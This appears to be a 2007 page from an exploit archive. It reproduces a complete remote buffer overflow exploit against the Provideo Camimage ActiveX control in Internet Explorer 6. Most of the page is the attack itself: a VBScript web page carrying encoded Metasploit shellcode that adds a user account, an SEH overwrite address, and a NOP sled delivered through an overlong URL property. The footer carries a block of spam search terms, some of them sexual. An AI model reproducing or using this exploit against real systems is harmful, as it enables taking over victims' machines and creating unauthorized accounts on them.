about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , IE6 / Provideo Camimage (ISSCamControl.dll 1.0.1.5) Remote BoF Exploit




2007-06-03 IE6 / Provideo Camimage (ISSCamControl.dll 1.0.1.5) Remote BoF Exploit 
Rated as : Critical

<!-- IE6 / Provideo Camimage class (ISSCamControl.dll 1.0.1.5)
remote seh overwrite exploit / win2k sp4

tried the SD-222VPRO camera series,you can reach an online demo here:
http://www.provideo.com.tw/security%20live%20demo.htm

rgod
-->
<HTML>
<object classid='clsid:AA0FB75C-C50E-47B6-B7E0-3B9C3FAA8AC4'
id='Camimage' /></object>
<script language='vbscript'>

REM metasploit one, add a user 'su' with pass 'tzu'
shellcode   =
unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49%37%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%44%58%50%30%41%30%41%6b%41%41%54%42%41%32%41%41%32%42%41%30%42%41%58%38%41%42%50%75%68%69%39%6c%38%68%31%54%43%30%47%70%57%70%4c%4b%30%45%77%4c%6e%6b%31%6c%47%75%51%68%43%31%48%6f%6c%4b%52%6f%75%48%4c%4b%63%6f%31%30%53%31%38%6b%71%59%6c%4b%36%54%6c%4b%47%71%48%6e%64%71%4f%30%4d%49%6c%6c%4e%64%4b%70%30%74%76%67%4a%61%39%5a%76%6d%55%51%6b%72%4a%4b%68%74%47%4b%70%54%35%74%55%54%61%65%6b%55%6c%4b%41%4f%77%54%34%41%48%6b%71%76%6e%6b%46%6c%62%6b%6e%6b%33%6f%77%6c%54%41%68%6b%6e%6b%57%6c%6c%4b%46%61%48%6b%4f%79%61%4c%71%34%56%64%48%43%54%71%4b%70%31%74%4c%4b%37%30%46%50%4f%75%4f%30%41%68%46%6c%6e%6b%43%70%46%6c%6c%4b%30%70%35%4c%6e%4d%4e%6b%50%68%35%58%68%6b%56%69%6c%4b%4b%30%6e%50%57%70%53%30%73%30%4e%6b%62%48%67%4c%43%6f%50%31%4a%56%51%70%36%36%6d%59%58%78%6d%53%49%50%33%4b%56%30%42%48%41%6e%58%58%6d%32%70%73%41%78%6f%68%69%6e%6f%7a%54%4e%42%77%49%6f%38%67%33%53%30%6d%75%34%41%30%66%4f%70%63%65%70%52%4e%43%55%31%64%31%30%74%35%33%43%63%55%51%62%31%30%51%63%41%65%47%50%32%54%30%7a%42%55%61%30%36%4f%30%61%43%54%71%74%35%70%57%56%65%70%70%6e%61%75%52%54%45%70%32%4c%70%6f%70%63%73%51%72%4c%32%47%54%32%32%4f%42%55%30%70%55%70%71%51%65%34%32%4d%62%49%50%6e%42%49%74%33%62%54%43%42%30%61%42%54%70%6f%50%72%41%63%67%50%51%63%34%35%77%50%66%4f%32%41%61%74%71%74%35%50%44")
+ NOP
seh_handler = unescape("%1e%16%e6%77") : REM 0x77e6161e call edi
user32.dll
nop         = string(96,unescape("%90"))
suntzu      = "http://www." + String(97,"a") +
seh_handler + nop + shellcode + nop + ".com"

Camimage.URL = suntzu

</script>
</HTML>

securitydot.net - 2007-06-03

Advertising

Copyright 2007, SecurityDot
Thu, 21 Aug 2008 21:20:55 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
news for c mallika se www.exotic 3gp+micro+ t614t news for c waptick.co sexgirl us WWW.TELUGU WWW.TELUGU news for c 200 /compo teen sex v www.monste Www89sexco news for c mambo Remo Www.sexbra SecurityDo CMS is Fre news for c www.sex an Jilat www.monste Free indiy pussy crea secxy pict Freesax remote rad mambo Remo chat rooms www.sexypi port 2222 all cartoo Arbic sex anak sma WWW XXX Vi mambo Remo toolbar.ca Www.bbwsex mambo Remo Tagger LE exploit wi t1t my-egaller tivoli SEXY BLACK all cartoo Sexsmu Www89sexco